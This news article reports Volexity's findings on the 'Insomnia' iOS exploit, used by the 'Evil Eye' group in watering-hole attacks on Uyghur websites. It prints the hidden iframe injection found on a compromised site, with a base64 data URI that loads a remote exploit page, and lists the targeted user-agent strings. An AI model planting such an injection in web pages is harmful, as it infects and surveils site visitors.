Intelligence agencies globally spy on their citizens often under the pretext of “security reasons.” While this hasn’t been well received in Western countries, others remain a different case. China on the other end is a different ball game.
Last year, Hackread.com reported that the Chinese government is utilizing facial recognition databases for probably months to remotely monitor the Uyghur populace in the Xinjiang region. Now, in a research report released by Volexity – a cybersecurity firm – it has revealed the existence of an iOS vulnerability being exploited to spy on the Uyghurs minority in China.
See: “BreedReady” database of 1.8m Chinese women surfaced online
Dubbed as Insomnia by researchers; the iOS vulnerability is believed to have been at its maximum usage from January to March 2020 working on iOS versions 12.3, 12.3.1, and 12.3.2 whereas Apple patched the vulnerability in 12.4 in July 2019.
It is worth noting that according to researchers, the group is this campaign is called Evil Eye while the vulnerability itself is exploited to carry out the Waterholing, an attack quite popular among Chinese hackers and previously used in cyberattacks against national data center of an unknown Central Asian country.
Watering holes is a technique in which famous websites are infected with malware so that visitors unknowingly get their devices infected.
As for the ongoing campaign, the potential impact of it is huge since 43% of iPads and 30% of iPhones are reported to be using iOS 12 or earlier according to Apple itself.
Coming to the data stolen through this attack, it includes GPS coordinates, contact numbers, emails from Gmail and Protonmail, photos from the iPhone photos app, messages from numerous messenger platforms such as Whatsapp, Telegram, WeChat, iMessage, Hangouts and even those photos sent through the highly secure Signal app.
How it works is by basically loading the malware initially on Uyghur themed websites that have been compromised. The loading methods include but are not limited to the use of iframes and modified JavaScript files.
An example of the code found on one website which loaded it through an iframe was as follows:
<divstyle=”display: none”>
<iframe src=”data:text/html;base64,PGh0bWw+PGhlYWQ+PGJvZHk+PGlmcmFtZSBzcmM9Imh0dHBzOi8vY2RuLmRvdWJsZXNjbGljay
5tZS9pbmRleC5odG1sIj48L2lmcmFtZT48L2JvZHk+PC9oZWFkPjwvaHRtbD4=”>
</iframe>
</div>
Secondly, the browser of the visiting user is checked through the user-agent string. These accepted strings would include the following:
Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 EdgiOS/44.5.0.10 Mobile/15E148 Safari/604.1
Mozilla/5.0 (iPad; 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 EdgiOS/44.5.2 Mobile/15E148 Safari/605.1.15CPU OS 1
All mobile-based browsers would fit this criterion as they used Webkit. In fact, in their blog post, the researchers stated that they were able to,
“Confirm the successful exploitation of a phone running 12.3.1 via the Apple Safari, Google Chrome, and Microsoft Edge mobile browsers.”
However, if no such string is found, a simple “ok” message is returned by the server. In the event that it is found, two malicious JavaScript files are loaded named jquery.js and s.js with the exploit running thereafter as shown in the illustration above.
Currently, it is to be noted that this group is plausibly believed to be backed by the Chinese government pointing to another example of the crackdown on minority rights with Beijing’s will to exert greater control.
See: Android malware hits Xiaomi devices & minority group in China
Moreover, Evil Eye has also been previously caught in August 2019 when it had been using 14 iOS vulnerabilities to target Uyghur websites through the same techniques. Although it stopped back then due to a report by Google, despite operating for almost 3 years, it started again this time with another exploit.
Concluding, if you have visited any such website, a phone reboot would normally suffice due to no persistence mechanism being in place for the malware to remain installed. Explaining, the researchers state:
The attackers must work quickly to obtain data that they want from a device before it reboots, or that they may potentially rely on the ability to reinfect a phone. Alternatively, it may be possible the attackers have a method to maintain persistence but only set this up manually after verifying the target.
Moreover, it is advised that you avoid visiting any potentially compromised websites to reduce the chances of infection along with using a good anti-virus app that lets you know the security status of websites on the fly. If you own an Apple device, updating it would also be highly recommended.
Did you enjoy reading this article? Kindly do like our page on Facebook and follow us on Twitter.